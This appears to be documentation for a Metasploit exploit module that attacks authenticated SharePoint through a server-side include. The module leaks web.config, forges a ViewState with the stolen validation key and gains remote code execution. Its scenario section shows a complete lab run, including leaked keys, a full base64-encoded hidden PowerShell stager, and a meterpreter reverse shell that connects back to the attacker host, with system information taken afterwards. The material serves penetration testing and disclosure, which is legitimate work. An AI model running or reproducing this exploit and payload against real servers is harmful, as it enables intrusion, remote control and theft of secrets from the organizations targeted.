## Vulnerable Application ### Description This module exploits a server-side include (SSI) in SharePoint to leak the `web.config` file and forge a malicious ViewState with the extracted validation key. This exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint. The `web.config` file will be stored in loot once retrieved, and the `VALIDATION_KEY` option can be set to short-circuit the SSI and trigger the ViewState deserialization. Tested against SharePoint 2019 on Windows Server 2016. ### Setup Follow [Microsoft's documentation](https://docs.microsoft.com/en-us/sharepoint/install/install-sharepoint-server-2016-on-one-server). ## Verification Steps Follow [Setup](#setup) and [Scenarios](#scenarios). ## Targets ### Windows Command This executes a Windows command. ### Windows Dropper This uses a Windows dropper to execute code. ### PowerShell Stager This uses a PowerShell stager to execute code. ## Options ### HttpUsername Set this to the SharePoint username. ### HttpPassword Set this to the SharePoint password. ### VALIDATION_KEY Set this to the ViewState validation key if you have it. ### COOKIE Set this to a SharePoint cookie if you have one. This is primarily useful for form auth. ## Scenarios ### SharePoint 2019 on Windows Server 2016 ``` msf6 > use exploit/windows/http/sharepoint_ssi_viewstate [*] Using configured payload windows/x64/meterpreter/reverse_https msf6 exploit(windows/http/sharepoint_ssi_viewstate) > options Module options (exploit/windows/http/sharepoint_ssi_viewstate): Name Current Setting Required Description ---- --------------- -------- ----------- COOKIE no SharePoint cookie if you have one HttpPassword no SharePoint password HttpUsername no SharePoint username Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes Base path URIPATH no The URI to use for this exploit (default is random) VALIDATION_KEY no ViewState validation key VHOST no HTTP server virtual host Payload options (windows/x64/meterpreter/reverse_https): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The local listener hostname LPORT 8443 yes The local listener port LURI no The HTTP Path Exploit target: Id Name -- ---- 2 PowerShell Stager msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set rhosts 192.168.123.237 rhosts => 192.168.123.237 msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httpusername Administrator httpusername => Administrator msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httppassword Passw0rd! httppassword => Passw0rd! msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set lhost 192.168.123.1 lhost => 192.168.123.1 msf6 exploit(windows/http/sharepoint_ssi_viewstate) > run [*] Started HTTPS reverse handler on https://192.168.123.1:8443 [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build. [*] Creating page for SSI: /z0zL8ruBOIcdq7aVekdlh.aspx [+] Successfully created page [*] Leaking web.config [+] Saved web.config to /Users/wvu/.msf4/loot/20201015131428_default_192.168.123.237_web.config_940022.txt [+] ViewState validation key: FEF7456DF90E1A6B7CA04D00ED56228602E2AF3C94B7A34F7735D5AFC340C9E4 [*] Deleting /z0zL8ruBOIcdq7aVekdlh.aspx [+] Successfully deleted page [*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https [*] Powershell command length: 2918 [*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" [+] Successfully executed command [*] https://192.168.123.1:8443 handling request from 192.168.123.237; (UUID: 8g4qnmlb) Staging x64 payload (201308 bytes) ... [*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.237:62885) at 2020-10-15 13:15:00 -0500 meterpreter > getuid Server username: GIBSON\Administrator meterpreter > sysinfo Computer : WIN-G2PGASM3QFA OS : Windows 2016+ (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : GIBSON Logged On Users : 18 Meterpreter : x64/windows meterpreter > ```